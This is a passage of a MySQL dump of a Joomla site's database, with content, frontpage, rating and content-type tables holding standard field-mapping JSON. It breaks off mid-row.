00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,1,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''),(20,72,'Take the Survey now!','take-the-survey-now','<p>Loading...</p>','',-2,9,'2015-05-09 17:58:20',53,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2015-05-09 17:58:20','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,1,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\",\"tags\":null}',0,'*',''); /*!40000 ALTER TABLE `jos_content` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_content_frontpage` -- DROP TABLE IF EXISTS `jos_content_frontpage`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_content_frontpage` ( `content_id` int(11) NOT NULL DEFAULT '0', `ordering` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_content_frontpage` -- LOCK TABLES `jos_content_frontpage` WRITE; /*!40000 ALTER TABLE `jos_content_frontpage` DISABLE KEYS */; INSERT INTO `jos_content_frontpage` VALUES (1,2),(18,1); /*!40000 ALTER TABLE `jos_content_frontpage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_content_rating` -- DROP TABLE IF EXISTS `jos_content_rating`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_content_rating` ( `content_id` int(11) NOT NULL DEFAULT '0', `rating_sum` int(10) unsigned NOT NULL DEFAULT '0', `rating_count` int(10) unsigned NOT NULL DEFAULT '0', `lastip` varchar(50) NOT NULL DEFAULT '', PRIMARY KEY (`content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_content_rating` -- LOCK TABLES `jos_content_rating` WRITE; /*!40000 ALTER TABLE `jos_content_rating` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_content_rating` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_content_types` -- DROP TABLE IF EXISTS `jos_content_types`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_content_types` ( `type_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `type_title` varchar(255) NOT NULL DEFAULT '', `type_alias` varchar(255) NOT NULL DEFAULT '', `table` varchar(255) NOT NULL DEFAULT '', `rules` text NOT NULL, `field_mappings` text NOT NULL, `router` varchar(255) NOT NULL DEFAULT '', `content_history_options` varchar(5120) NOT NULL COMMENT 'JSON string for com_contenthistory options', PRIMARY KEY (`type_id`), KEY `idx_alias` (`type_alias`) ) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_content_types` -- LOCK TABLES `jos_content_types` WRITE; /*!40000 ALTER TABLE `jos_content_types` DISABLE KEYS */; INSERT INTO `jos_content_types` VALUES (1,'Article','com_content.article','{\"special\":{\"dbtable\":\"#__content\",\"key\":\"id\",\"type\":\"Content\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"introtext\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"attribs\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"asset_id\"}, \"special\": {\"fulltext\":\"fulltext\"}}','ContentHelperRoute::getArticleRoute','{\"formFile\":\"administrator\\/components\\/com_content\\/models\\/forms\\/article.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(2,'Weblink','com_weblinks.weblink','{\"special\":{\"dbtable\":\"#__weblinks\",\"key\":\"id\",\"type\":\"Weblink\",\"prefix\":\"WeblinksTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"url\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {}}','WeblinksHelperRoute::getWeblinkRoute','{\"formFile\":\"administrator\\/components\\/com_weblinks\\/models\\/forms\\/weblink.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"featured\",\"images\"], \"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(3,'Contact','com_contact.contact','{\"special\":{\"dbtable\":\"#__contact_details\",\"key\":\"id\",\"type\":\"Contact\",\"prefix\":\"ContactTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"address\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"image\", \"core_urls\":\"webpage\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"con_position\":\"con_position\",\"suburb\":\"suburb\",\"state\":\"state\",\"country\":\"country\",\"postcode\":\"postcode\",\"telephone\":\"telephone\",\"fax\":\"fax\",\"misc\":\"misc\",\"email_to\":\"email_to\",\"default_con\":\"default_con\",\"user_id\":\"user_id\",\"mobile\":\"mobile\",\"sortname1\":\"sortname1\",\"sortname2\":\"sortname2\",\"sortname3\":\"sortname3\"}}','ContactHelperRoute::getContactRoute','{\"formFile\":\"administrator\\/components\\/com_contact\\/models\\/forms\\/contact.xml\",\"hideFields\":[\"default_con\",\"checked_out\",\"checked_out_time\",\"version\",\"xreference\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[ {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ] }'),(4,'Newsfeed','com_newsfeeds.newsfeed','{\"special\":{\"dbtable\":\"#__newsfeeds\",\"key\":\"id\",\"type\":\"Newsfeed\",\"prefix\":\"NewsfeedsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"numarticles\":\"numarticles\",\"cache_time\":\"cache_time\",\"rtl\":\"rtl\"}}','NewsfeedsHelperRoute::getNewsfeedRoute','{\"formFile\":\"administrator\\/components\\/com_newsfeeds\\/models\\/forms\\/newsfeed.xml\",\"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(5,'User','com_users.user','{\"special\":{\"dbtable\":\"#__users\",\"key\":\"id\",\"type\":\"User\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"null\",\"core_alias\":\"username\",\"core_created_time\":\"registerdate\",\"core_modified_time\":\"lastvisitDate\",\"core_body\":\"null\", \"core_hits\":\"null\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"access\":\"null\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"null\", \"core_language\":\"null\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"null\", \"core_ordering\":\"null\", \"core_metakey\":\"null\", \"core_metadesc\":\"null\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {}}','UsersHelperRoute::getUserRoute',''),(6,'Article Category','com_content.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContentHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(7,'Contact Category','com_contact.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContactHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(8,'Newsfeeds Category','com_newsfeeds.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','NewsfeedsHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(9,'Weblinks Category','com_weblinks.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','WeblinksHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10,'Tag','com_tags.tag','{\"special\":{\"dbtable\":\"#__tags\",\"key\":\"tag_id\",\"type\":\"Tag\",\"prefix\":\"TagsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\"}}','TagsHelperRoute::getTagRoute','{\"formFile\":\"administrator\\/components\\/com_tags\\/models\\/forms\\/tag.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"lft\", \"rgt\", \"level\", \"path\", \"urls\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(11,'Banner','com_banners.banner','{\"special\":{\"dbtable\":\"#__banners\",\"key\":\"id\",\"type\":\"Banner\",\"prefix\":\"BannersTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"null\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"imptotal\":\"imptotal\", \"impmade\":\"impmade\", \"clicks\":\"clicks\", \"clickurl\":\"clickurl\", \"custombannercode\":\"custombannercode\", \"cid\":\"cid\", \"purchase_type\":\"purchase_type\", \"track_impressions\":\"track_impressions\", \"track_clicks\":\"track_clicks\"}}','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/banner.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"reset\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"imptotal\", \"impmade\", \"reset\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"cid\",\"targetTable\":\"#__banner_clients\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(12,'Banners Category','com_banners.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(13,'Banner 